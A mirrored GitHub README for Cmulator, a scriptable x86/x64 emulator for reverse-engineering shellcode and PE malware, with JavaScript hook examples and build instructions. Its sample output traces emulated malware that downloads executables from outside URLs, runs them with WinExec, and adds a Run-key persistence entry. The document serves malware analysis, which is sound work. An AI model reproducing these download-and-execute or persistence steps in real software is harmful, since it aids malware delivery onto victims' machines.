增强现实AR>> Cmulator>> 返回
项目作者: Coldzer0

项目描述 :
Cmulator is ( x86 - x64 ) Scriptable Reverse Engineering Sandbox Emulator for shellcode and PE binaries . Based on Unicorn & Zydis Engine & javascript
高级语言: Pascal
项目地址: git://github.com/Coldzer0/Cmulator.git
创建时间: 2018-09-15T07:00:42Z
项目社区:https://github.com/Coldzer0/Cmulator
开源协议:GNU Affero General Public License v3.0
下载


Cmulator - Scriptable x86 RE Sandbox Emulator (v0.3 Beta)

License: AGPL v3



Cmulator is ( x86 - x64 )
Scriptable Reverse Engineering Sandbox Emulator for shellcode and PE binaries

Based on Unicorn & Capstone Engine & javascript .

💬 This is the last supported Pascal version and new code base (C/C++) will be in here Cmulator.

Supported Architectures:

  • i386
  • x86-64

Supported File Formats

  • PE, PE+
  • shellcodes

Known problems" class="reference-link">Known problems

  • there’s a bug in Unicorn modifying data near EIP

    if anyone can help please check unicorn#820

Current Features

  • Simulated GDT & Segments.
  • Simulated TEB & PEB structures for both Shellcodes and PE.
  • Simulated LDR Table & Data.
  • Manages Image and Stack memory.
  • Evaluates functions based on DLL exports.
  • Trace all Executed API ( good for Obfuscated PE).
  • Displays HexDump with Strings based on referenced memory locations.
  • Patching the Memory.
  • Custom API hooks using Javascript (scripting).
  • Handle SEH (still need more work).
  • [+] Hook Address.
  • [+] Apiset map resolver


[+] Changelog

  • V0.3 Beta

  • v0.2 beta

    • [+] Add Hook Address
    • [+] Implementing Api schema forworder
    • [+] Change disassembler from Capstone to Zydis Engine
    • [√] improvements for SEH handling
    • [√] improvements with JS to API handle
    • [√] Improve API detection by address or name or ordinal

  • v0.1 beta

    • Init version




Hook Example JavaScript

  1. var GetModuleFileName = new ApiHook();
  2. /*
  3. DWORD WINAPI GetModuleFileName(
  4.   _In_opt_ HMODULE hModule,
  5.   _Out_    LPTSTR  lpFilename,
  6.   _In_     DWORD   nSize
  7. );
  8. */
  9. GetModuleFileName.OnCallBack = function (Emu, API, ret) {
  11.     Emu.pop(); // ret
  13.     var hModule    = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.pop();
  14.     var lpFilename = Emu.isx64 ? Emu.ReadReg(REG_RDX) : Emu.pop();
  15.     var nSize       = Emu.isx64 ? Emu.ReadReg(REG_R8D) : Emu.pop();
  17.     var mName = Emu.GetModuleName(hModule);
  18.     var Path = 'C:\\pla\\' + mName;
  20.     var len = API.IsWapi ? Emu.WriteStringW(lpFilename,Path) : Emu.WriteStringA(lpFilename,Path);
  22.     // null byte - mybe needed maybe not :D - i put it anyway :V 
  23.     API.IsWapi ? Emu.WriteWord(lpFilename + (len * 2),0) : Emu.WriteByte(lpFilename+len,0);
  25.     print("{0}(0x{1}, 0x{2}, 0x{3}) = '{4}'".format(
  26.         API.name,
  27.         hModule.toString(16),
  28.         lpFilename.toString(16),
  29.         nSize.toString(16),
  30.         Path
  31.     ));
  33.     // MS Docs : the return value is the length of the string
  34.     Emu.SetReg(Emu.isx64 ? REG_RAX : REG_EAX, len);    
  35.     Emu.SetReg(Emu.isx64 ? REG_RIP : REG_EIP, ret);
  36.     return true; // true if you handle it false if you want Emu to handle it and set PC .
  37. };
  39. GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameA');
  40. GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameW');
  1. var _vsnprintf = new ApiHook();
  2. /*
  3. int _vsnprintf(  
  4.    char *buffer,  
  5.    size_t count,  
  6.    const char *format,  
  7.    va_list argptr   
  8. );
  9. */
  10. _vsnprintf.OnCallBack = function (Emu, API, ret) {
  12.     // save the param to args
  13.     // args is an Array and it's implemented in every ApiHook .
  14.     _vsnprintf.args[0] = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.ReadDword(Emu.ReadReg(REG_ESP) + 4);
  16.     // i think implementing this in JS is hard 
  17.     // so just let the library handle it :D 
  18.     return true; // True so we continue to the lib code .
  19. };
  21. // OnExit Callback ..
  22. _vsnprintf.OnExit = function(Emu,API){
  24.     // Read Our Saved Param .
  25.     var buffer = _vsnprintf.args[0];
  27.     warn("OnExit : _vsnprintf() = '{0}' ".format(
  28.         Emu.ReadStringA(buffer)
  29.     ));
  30. }
  32. _vsnprintf.install('msvcrt.dll', '_vsnprintf');


Example Output :

AntiDebug Downloader



Coldzer0 @ OSX $./Cmulator -f ../../samples/AntiDebugDownloader.exe -q Cmulator Malware Analyzer - By Coldzer0 Compiled on : 2018/09/29 - 01:51:51 Target CPU : i386 & x86_x64 Unicorn Engine : v1.0 Cmulator : v0.1 "AntiDebugDownloader.exe" is : x32 Mapping the File .. [+] Unicorn Init done . [√] Set Hooks [√] PE Mapped to Unicorn [√] PE Written to Unicorn [---------------- PE Info --------------] [*] File Name : AntiDebugDownloader.exe [*] Image Base : 0000000000400000 [*] Address Of Entry : 0000000000001000 [*] Size Of Headers : 0000000000000400 [*] Size Of Image : 0000000000004000 [---------------------------------------] [---------------------------------------] [ Fixing PE Imports ] [*] File Name : AntiDebugDownloader.exe [*] Import 3 Dlls [+] Fix IAT for : kernel32.dll [+] Fix IAT for : urlmon.dll [+] Fix IAT for : advapi32.dll [---------------------------------------] [+] Segments & (TIB - PEB) Init Done . [+] Loading JS Main Script : ../API.JS Initiating 52 Libraries ... [>] Run AntiDebugDownloader.exe 0x401005 : IsDebuggerPresent = 0 GetWindowsDirectoryA(403000, 260) = 10 - 'C:\Windows' 0x40103d : URLDownloadToFileA(0, 'https://www.dropbox.com/s/fr3z6axblxfcmq8/UrlDownLoadtoFile.exe?dl=0', 'C:\Windows', 0, 0) 0x401051 : RegCreateKeyA(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', 0x403159) = 144 0x40106f : RegSetValueExA(144, 'ransomware', 0, REG_SZ, 'C:\Windows', 260) 0x40107a : RegCloseKey() ExitProcess(0x0) 26 Branches - Executed in 9 ms Cmulator Stop >> last Error : OK (UC_ERR_OK) Press Enter to Close ¯\_(ツ)_/¯


x64 Down & Exec ShellCode




Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/down_exec64.sc -sc -x64 Cmulator Malware Analyzer - By Coldzer0 Compiled on : 2018/09/29 - 03:07:11 Target CPU : i386 & x86_x64 Unicorn Engine : v1.0 Cmulator : v0.1 "sc64.exe" is : x64 Mapping the File .. [+] Unicorn Init done . [√] Set Hooks [√] PE Mapped to Unicorn [√] PE Written to Unicorn [---------------- PE Info --------------] [*] File Name : sc64.exe [*] Image Base : 0000000000400000 [*] Address Of Entry : 0000000000001000 [*] Size Of Headers : 0000000000000400 [*] Size Of Image : 0000000000002000 [---------------------------------------] [*] Writing Shellcode to memory ... [√] Shellcode Written to Unicorn [---------------------------------------] [ Fixing PE Imports ] [*] File Name : sc64.exe [*] Import 0 Dlls [---------------------------------------] [+] Segments & (TIB - PEB) Init Done . [+] Loading JS Main Script : ../API.JS Initiating 25 Libraries ... [>] Run sc64.exe LoadLibraryA('urlmon') = 0x70714000 GetProcAddress(0x70714000,'URLDownloadToFileA') = 0x707ADB10 0x40111b : URLDownloadToFileA(0, 'http://192.168.10.129/pl.exe', 'C:\\Users\\Public\\p.exe', 0, 2489880) SetFileAttributesA('C:\\Users\\Public\\p.exe',0x2) WinExec('C:\\Users\\Public\\p.exe', 0) FatalExit(0x0) 95 Steps - Executed in 295 ms Cmulator Stop >> last Error : OK (UC_ERR_OK) Press Enter to Close ¯\_(ツ)_/¯


x32 Down & Exec ShellCode




Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/URLDownloadToFile.sc -sc Cmulator Malware Analyzer - By Coldzer0 Compiled on : 2018/09/29 - 03:07:11 Target CPU : i386 & x86_x64 Unicorn Engine : v1.0 Cmulator : v0.1 "sc32.exe" is : x32 Mapping the File .. [+] Unicorn Init done . [√] Set Hooks [√] PE Mapped to Unicorn [√] PE Written to Unicorn [---------------- PE Info --------------] [*] File Name : sc32.exe [*] Image Base : 0000000000400000 [*] Address Of Entry : 0000000000001000 [*] Size Of Headers : 0000000000000400 [*] Size Of Image : 0000000000002000 [---------------------------------------] [*] Writing Shellcode to memory ... [√] Shellcode Written to Unicorn [---------------------------------------] [ Fixing PE Imports ] [*] File Name : sc32.exe [*] Import 0 Dlls [---------------------------------------] [+] Segments & (TIB - PEB) Init Done . [+] Loading JS Main Script : ../API.JS Initiating 25 Libraries ... [>] Run sc32.exe GetProcAddress(0x70300000,'LoadLibraryA') = 0x703149D7 LoadLibraryA('urlmon.dll') = 0x7065a000 GetProcAddress(0x7065A000,'URLDownloadToFileA') = 0x706F08D0 GetProcAddress(0x70300000,'WinExec') = 0x70392C21 0x40113b : URLDownloadToFileA(0, 'https://rstforums.com/fisiere/dead.exe', 'dead.exe', 0, 0) WinExec('dead.exe', 1) 3041 Steps - Executed in 415 ms Cmulator Stop >> last Error : OK (UC_ERR_OK) Press Enter to Close ¯\_(ツ)_/¯


Show SEH handling (PELock Obfuscator)



Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe -ex Cmulator Malware Analyzer - By Coldzer0 Compiled on : 2018/09/29 - 03:07:11 Target CPU : i386 & x86_x64 Unicorn Engine : v1.0 Cmulator : v0.1 "obfuscated.exe" is : x32 Mapping the File .. [+] Unicorn Init done . [√] Set Hooks [√] PE Mapped to Unicorn [√] PE Written to Unicorn [---------------- PE Info --------------] [*] File Name : obfuscated.exe [*] Image Base : 0000000000400000 [*] Address Of Entry : 000000000000A4BD [*] Size Of Headers : 0000000000001000 [*] Size Of Image : 000000000000F000 [---------------------------------------] [---------------------------------------] [ Fixing PE Imports ] [*] File Name : obfuscated.exe [*] Import 2 Dlls [+] Fix IAT for : KERNEL32.dll [+] Fix IAT for : USER32.dll [---------------------------------------] [+] Segments & (TIB - PEB) Init Done . [+] Loading JS Main Script : ../API.JS Initiating 44 Libraries ... [>] Run obfuscated.exe EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 1, data value = 0x0 0x403031 Exception caught SEH 0x25FEEC - Handler 0x409215 ZwContinue -> Context = 0x25F97C EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0 0x4056EC Exception caught SEH 0x25FEE8 - Handler 0x402516 ZwContinue -> Context = 0x25F978 EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0 0x401974 Exception caught SEH 0x25FEE4 - Handler 0x4019CE ZwContinue -> Context = 0x25F974 MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64) EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0 0x403A49 Exception caught SEH 0x25FEF4 - Handler 0x40A17B ZwContinue -> Context = 0x25F984 EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0 0x40AD64 Exception caught SEH 0x25FEF4 - Handler 0x40B461 ZwContinue -> Context = 0x25F984 ExitProcess(0x0) 7387 Steps - Executed in 118 ms Cmulator Stop >> last Error : OK (UC_ERR_OK) Press Enter to Close ¯\_(ツ)_/¯


Hide SEH handling (PELock Obfuscator)



Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe Cmulator Malware Analyzer - By Coldzer0 Compiled on : 2018/09/29 - 03:07:11 Target CPU : i386 & x86_x64 Unicorn Engine : v1.0 Cmulator : v0.1 "obfuscated.exe" is : x32 Mapping the File .. [+] Unicorn Init done . [√] Set Hooks [√] PE Mapped to Unicorn [√] PE Written to Unicorn [---------------- PE Info --------------] [*] File Name : obfuscated.exe [*] Image Base : 0000000000400000 [*] Address Of Entry : 000000000000A4BD [*] Size Of Headers : 0000000000001000 [*] Size Of Image : 000000000000F000 [---------------------------------------] [---------------------------------------] [ Fixing PE Imports ] [*] File Name : obfuscated.exe [*] Import 2 Dlls [+] Fix IAT for : KERNEL32.dll [+] Fix IAT for : USER32.dll [---------------------------------------] [+] Segments & (TIB - PEB) Init Done . [+] Loading JS Main Script : ../API.JS Initiating 44 Libraries ... [>] Run obfuscated.exe MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64) ExitProcess(0x0) 7387 Steps - Executed in 116 ms Cmulator Stop >> last Error : OK (UC_ERR_OK) Press Enter to Close ¯\_(ツ)_/¯




And Try it Your Self , find it at “samples/obfuscated/obfuscated.exe” 😉


WIP BY Priority :

  • Memory Manager - Next version
  • Checking for Bug & fixing them 👌🏻
  • Api schema forwarder still need more improvements and testing

TODO BY Priority :

  • PC (RIP - EIP) Hook.
  • improving exception handling.
  • Native Plugins & API Hook Libs.
  • Api schema forwarder.
  • Add Memory Manager.
  • Sysenter / Syscall Global Hook in JS.
  • Control TEB/PEB in JS.
  • Interactive debug shell.
  • Add Assembler.
  • Implement Threading.

Requirements

  • Freepascal >= v3
  • Unicorn Engine
  • Zydis Engine
  • QuickJS Engine

Installation

  • Install Lazarus IDE
  • You will find all needed libraries in “libraries” Folder ;)
  • Now Build

Build

1. Build Cmulator

  1. git clone https://github.com/Coldzer0/Cmulator.git
  3. Open "Cmulator.lpi" with Lazarus IDE 
  5. Then Hit Compile :D
  6. Oh Before that you need to select the Build Mode
  8. From Laz IDE Select 
  10. Projects -> Project Options -> Compiler Options 
  12. and Select the Mode for your OS .

Or Just Download From Releases



2. Create config.json config file

  1. touch config.json

3. Set Win dlls Path

set the dll folders to where you stored your windows dlls and JS Main File . 

  1. {
  2.   "system": {
  3.     "win32": "../win_dlls/x32_win7",
  4.     "win64": "../win_dlls/x64_win7",
  5.     "Apiset": "../Apiset.json"
  6.   },
  7.   "JS": {
  8.       "main": "../API.JS"
  9.   }
  10. }

Run

  1. ./Cmulator -file samples/AntiDebug.exe

Documentation

Still working on it , will be available soon.

Acknowledgements & Resources :

this work inspired by :

Used OpenSource Projects :

Resouces Used :

With ❤️ From Home.